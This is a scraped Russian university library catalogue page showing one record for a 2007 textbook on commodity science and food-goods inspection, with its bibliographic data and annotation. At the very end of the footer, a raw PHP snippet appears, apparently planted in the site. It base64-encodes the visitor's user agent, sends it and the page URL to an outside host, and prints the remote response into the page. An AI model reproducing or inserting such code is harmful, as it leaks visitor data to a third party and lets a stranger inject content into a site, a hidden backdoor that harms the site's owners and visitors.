Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

45 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=69F310D4-6511-4349-E7CF-0AD4D55CE7AB$")И(("Ключевые слова=Пряность"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
69F310D4-6511-4349-E7CF-0AD4D55CE7AB
(Нет сведений об экземплярах)
69F310D4-6511-4349-E7CF-0AD4D55CE7AB
658.6/6/Т50
Т 50
Товароведение и экспертиза потребительских товаров [Текст] : учеб. для торговых учеб. заведений / И. А. Ермилова [и др.]. - М. : ИНФРА-М, 2007. - 542, [1] с. : рис., табл. - (Высшее образование). - 3000 экз. - ISBN 5-16-002202-3 : 208.00 р.
УДК 658.62(075)
ББК 36-9я7

Рубрики:
Товароведение -- Учебники и пособия
Товары -- Экспертиза -- УЧЕБНИКИ И ПОСОБИЯ

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- КОДИРОВАНИЕ -- АССОРТИМЕНТ -- КОНСЕРВИРОВАНИЕ -- ТАРА -- УПАКОВКА -- КАЧЕСТВО -- ПРЯНОСТЬ -- ПРИПРАВА -- КРАХМАЛ -- САХАР -- МЕД -- НАПИТОК -- БЕЗАЛКОГОЛЬНЫЕ -- АЛКОГОЛЬНЫЙ -- МОЛОКО -- ОВОЩИ -- КИСЛОМОЛОЧНЫЙ -- ЖИР -- МЯСО -- ЯЙЦО -- РЫБА -- ИКРА
Аннотация: В учебнике изложены предмет и задачи, теоретические основы товароведения, классификация, химический состав, пищевая ценность отдельных групп товаров. Даны современные особенности технологии отечественных и импортных продуктов. Особое внимание уделяется сертификации и проведению экспертизы товаров растительного и животного происхождения.
Доп. точки доступа:
Ермилова, И. А.
Герасимова, В. А.
Вытовтов, А. А.
Дмитриченко, М. И.
Дударева, Н. Т.
Денисова, С. А.
Нилова, Л. П.
Пилипенко, Т. В.
Лазарев, Е. Н.
Малютенкова, С. М.
Шевченко, В. В.рук. работы.

Нет сведений об экземплярах
Держатели документа:
Научная библиотека Омского государственного технического университета : Россия, 644050, г. Омск, проспект Мира, 11
Омский экономический институт : Россия, г. Омск, пр. Комарова, 13
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11

В учебнике изложены предмет и задачи, теоретические основы товароведения, классификация, химический состав, пищевая ценность отдельных групп товаров. Даны современные особенности технологии отечественных и импортных продуктов. Особое внимание уделяется сертификации и проведению экспертизы товаров растительного и животного происхождения.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2813 - 20.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.07 с.14 запросов, 1.23c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;